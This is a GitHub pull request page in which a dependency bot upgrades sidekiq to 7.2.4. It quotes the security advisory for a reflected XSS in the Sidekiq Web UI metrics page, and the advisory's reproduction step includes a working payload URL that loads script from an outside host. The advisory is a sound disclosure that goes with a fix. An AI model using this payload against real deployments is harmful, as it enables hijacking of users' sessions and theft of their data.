chore(deps): update dependency sidekiq to v7.2.4 [security]#108
Open
renovate[bot] wants to merge 1 commit intomasterfrom
Open
chore(deps): update dependency sidekiq to v7.2.4 [security]#108renovate[bot] wants to merge 1 commit intomasterfrom
renovate[bot] wants to merge 1 commit intomasterfrom
Conversation
50dbc9a to
3301543
Compare
3301543 to
d7472cd
Compare
d7472cd to
c2ddab5
Compare
c2ddab5 to
345afe2
Compare
345afe2 to
10d4159
Compare
10d4159 to
cd3de2e
Compare
cd3de2e to
495e2fd
Compare
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
This PR contains the following updates:
7.2.0→7.2.4GitHub Vulnerability Alerts
CVE-2024-32887
Description:
During the source Code Review of the metrics.erb view of the Sidekiq Web UI, A reflected XSS vulnerability is discovered. The value of substr parameter is reflected in the response without any encoding, allowing an attacker to inject Javascript code into the response of the application.
This vulnerability can be exploited to target the users of the application, and users of other applications deployed on the same domain or website as that of the Sidekiq website. Successful exploit results may result in compromise of user accounts and user data.
Impact:
The impact of this vulnerability can be severe. An attacker could exploit it to target users of the Sidekiq Web UI. Moreover, if other applications are deployed on the same domain or website as Sidekiq, users of those applications could also be affected, leading to a broader scope of compromise. Potentially compromising their accounts, forcing the users to perform sensitive actions, stealing sensitive data, performing CORS attacks, defacement of the web application, etc.
Mitigation:
Encode all output data before rendering it in the response to prevent XSS attacks.
Steps to Reproduce:
https://{host}/sidekiq/metrics?substr=beret%22%3E%3Cscript%20src=%22https://cheemahq.vercel.app/a.js%22%20/%3E
Evidence:
Figure 1: Source Code Vulnerable to XSS
Figure 2: XSS payload triggered
Release Notes
sidekiq/sidekiq (sidekiq)
v7.2.4Compare Source
Thanks to @UmerAdeemCheema for the security report.
v7.2.3Compare Source
v7.2.2Compare Source
Process.warmupcall in Ruby 3.3+v7.2.1Compare Source
Sidekiq::Worktype which replaces the raw Hash as the third parameter inSidekiq::WorkSet#each { |pid, tid, hash| ... }[#6145]hashblock parameter above.The
Sidekiq::Workinstance contains accessor methods to get at the same data, e.g.base64gem [#6151, earlopain]Configuration
📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR was generated by Mend Renovate. View the repository job log.